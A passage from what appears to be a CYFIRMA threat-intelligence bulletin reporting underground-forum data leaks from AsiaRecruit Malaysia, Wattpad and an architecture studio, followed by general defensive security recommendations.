The CYFIRMA Research team observed a data leak related to AsiaRecruit Malaysia (https[:]//www[.]asiarecruit[.]com[.]my) in an underground forum. Asia Recruit Malaysia is a premier recruitment agency with an expanding footprint across Asia. Serving a diverse range of industries, including Manufacturing, FMCG, Banking & Finance, IT, Oil & Gas, and Telecommunications, the agency has successfully placed countless professionals in roles across various sectors. The compromised user data includes email addresses, recruitment details, and other information. A total of 88,000 user emails have been leaked. The breach has been attributed to a threat actor known as “IntelBroker.”

Source: Underground forums

Relevancy & Insights:
Financially motivated cybercriminals are continuously scouring for exposed and vulnerable systems and applications to exploit. A significant number of these malicious actors congregate within underground forums, where they discuss cybercrime and trade stolen digital assets. Operating discreetly, these opportunistic attackers target unpatched systems or vulnerabilities in applications to illicitly gain access and steal valuable data.

Subsequently, the pilfered data is advertised for sale within underground markets, where it can be acquired, repurposed, and utilized by other malicious actors in further illicit activities.

ETLM Assessment:
“IntelBroker” represents a significant threat within the cybersecurity landscape due to its sophisticated tactics and high-profile targets. Organizations are advised to implement robust security measures such as access control, regular patch management, and employee training to mitigate risks associated with such threat actors. Continuous monitoring of emerging threats like IntelBroker will be essential for effective incident response strategies in the evolving cyber threat environment.

Recommendations: Enhance the cybersecurity posture by:

  1. Updating all software products to their latest versions is essential to mitigate the risk of vulnerabilities being exploited.
  2. Ensure proper database configuration to mitigate the risk of database-related attacks.
  3. Establish robust password management policies, incorporating multi-factor authentication and role-based access to fortify credential security and prevent unauthorized access.

8. Other Observations

The CYFIRMA Research team observed a data leak related to Wattpad (https[:]//www[.]wattpad[.]com/) in an underground forum. Wattpad is an online platform and community that enables users to read and publish original stories across various genres, including romance, teen fiction, and fan fiction. Wattpad has grown into a global hub for writers and readers. The platform boasts over 90 million monthly users and hosts more than 665 million story uploads. The compromised data includes the username, hashbcrypt, email, IP address, and other information, such as city, display name, or no additional details, along with the country. The breach has been attributed to a threat actor known as “CountySorter.”

Source: Underground Forums

The CYFIRMA Research team observed a data leak related to Tidtangstudio (https[:]//www[.]tidtangstudio[.]com/) in an underground forum. TIDTANG STUDIO is an architecture firm based in Bangkok, Thailand. They specialize in architectural and interior design, with a particular focus on the renovation of heritage buildings into hospitality spaces, such as hostels and hotels. The compromised data includes the ID, author, author email, author URL, IP address, date, amount, content, and other sensitive and confidential information. The breach has been attributed to a threat actor known as “Varun”.

Source: Underground Forums

STRATEGIC RECOMMENDATIONS

  • Attack Surface Management should be adopted by organisations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Delay a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, and active network monitoring, through next-generation security solutions and a ready-to-go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.

MANAGEMENT RECOMMENDATIONS

  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of risk-based information security strategy, the security controls applied, and the proper implementation of security technologies, followed by corrective actions remediations, and lessons learned.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcomings of EDR and SIEM solutions.
  • Detection processes are tested to ensure awareness of anomalous events. Timely communication of anomalies and continuously evolved to keep up with refined ransomware threats.

TACTICAL RECOMMENDATIONS

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improved incident response, increased the visibility of security metrics, and rapid execution of security checklists.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defences based on the tactical intelligence provided.
  • Deploy detection technologies that are behavioral anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security control such as reCAPTCHA (completely Automated Public Turing test to tell Computers and Humans Apart), Device fingerprinting, IP backlisting, Rate-limiting, and Account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.

Situational Awareness – Cyber News

Please find the Geography-Wise and Industry-Wise breakup of cyber news for the last 5 days as part of the situational awareness pillar.

Geography-Wise Graph

Industry-Wise Graph

For situational awareness intelligence and specific insights mapped to your organisation’s geography, industry, and technology, please access DeCYFIR.